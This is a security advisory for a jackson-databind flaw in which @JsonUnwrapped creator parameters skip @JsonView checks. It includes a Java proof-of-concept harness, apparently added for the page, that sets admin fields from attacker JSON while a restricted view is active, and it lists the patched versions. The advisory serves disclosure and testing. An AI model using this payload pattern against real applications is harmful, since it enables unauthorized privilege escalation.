CVE-2026-54518
Advisory (GitHub summary)
Summary
UnwrappedPropertyHandler.processUnwrappedCreatorProperties() replays buffered JSON into creator parameters but never consults prop.visibleInView(activeView). The normal property-based creator path gates creator properties on the active view, but this unwrapped-creator replay path bypasses that check, so a constructor parameter annotated with both @JsonView(AdminView.class) and @JsonUnwrapped is populated from attacker JSON even when a more restrictive view is active.
Impact
Where an application relies on @JsonView as a write-side authorization boundary (for example, deserializing request bodies with a restricted view so that privileged fields cannot be set), an unwrapped creator parameter restricted to a more privileged view can still be populated from untrusted input by any caller who controls the JSON.
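The harness below is an added example written for this page; it is not code from the jackson-databind project or from the advisory. It reproduces the pattern the summary describes: a creator parameter annotated with both @JsonView(AdminView.class) and @JsonUnwrapped, deserialized from attacker-controlled JSON while the more restrictive PublicView is active, then reports whether the view-restricted parameter was populated. The view classes, the Account and AdminSettings types, the readAsPublic helper and the JSON payload are constructed for the example. Imports target the 2.21 line; on the 3.x line ObjectMapper and DeserializationFeature live in the tools.jackson.databind package.

```java
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonUnwrapped;
import com.fasterxml.jackson.annotation.JsonView;
import com.fasterxml.jackson.databind.DeserializationFeature;
import com.fasterxml.jackson.databind.ObjectMapper;

public class UnwrappedViewCheck {

    // Views used as a write-side authorization boundary (constructed for this example).
    public static class PublicView {}
    public static class AdminView extends PublicView {}

    // Privileged fields; they appear at the top level of the JSON only via @JsonUnwrapped.
    public static class AdminSettings {
        public String role;
        public boolean active;
        public AdminSettings() {}
    }

    public static class Account {
        public final String username;
        public final AdminSettings admin; // expected to stay unset under PublicView

        @JsonCreator
        public Account(
                @JsonView(PublicView.class) @JsonProperty("username") String username,
                @JsonView(AdminView.class) @JsonUnwrapped AdminSettings admin) {
            this.username = username;
            this.admin = admin;
        }
    }

    // Constructed attacker payload: a PublicView caller smuggles the unwrapped admin fields.
    static final String UNTRUSTED_JSON =
            "{\"username\":\"mallory\",\"role\":\"admin\",\"active\":true}";

    // Deserialize with the restrictive view active, as a request handler for ordinary users would.
    public static Account readAsPublic(ObjectMapper mapper) throws Exception {
        return mapper.readerWithView(PublicView.class)
                     .forType(Account.class)
                     .readValue(UNTRUSTED_JSON);
    }

    // True when the view-restricted unwrapped creator parameter received attacker data.
    public static boolean adminFieldsPopulated(Account acct) {
        return acct.admin != null && "admin".equals(acct.admin.role);
    }

    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        // Harness choice: leftover tokens must not abort the read and hide the result.
        mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, false);

        Account acct = readAsPublic(mapper);
        System.out.println("username = " + acct.username);
        if (adminFieldsPopulated(acct)) {
            System.out.println("VULNERABLE: @JsonView bypassed for the @JsonUnwrapped creator parameter");
        } else {
            System.out.println("OK: view-restricted unwrapped creator parameter was not populated");
        }
    }
}
```

Run it once against an affected build (for example 2.21.3) and once against a patched one (2.21.4 or 3.1.4): the affected build reports the role "admin" despite PublicView being active, while the patched build should leave the parameter unpopulated. Independently of the upgrade, a request DTO that simply does not declare privileged fields is a more robust write-side boundary than a shared model gated by @JsonView.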
Affected / Patched (verified via git tag --contains)
- 2.21 line: >= 2.21.0, < 2.21.4; fixed in 2.21.4 (backport 721fa07, #5973)
- 3.x line: >= 3.0.0, < 3.1.4; fixed in 3.1.4 (#5971, d633bc0)
Severity / CWE
Severity: rated minor by the maintainer, HIGH by the reporter. CWE-863 (Incorrect Authorization); related CWE-284 (Improper Access Control).
Credits
Omkhar Arasaratnam (@omkhar) - finder.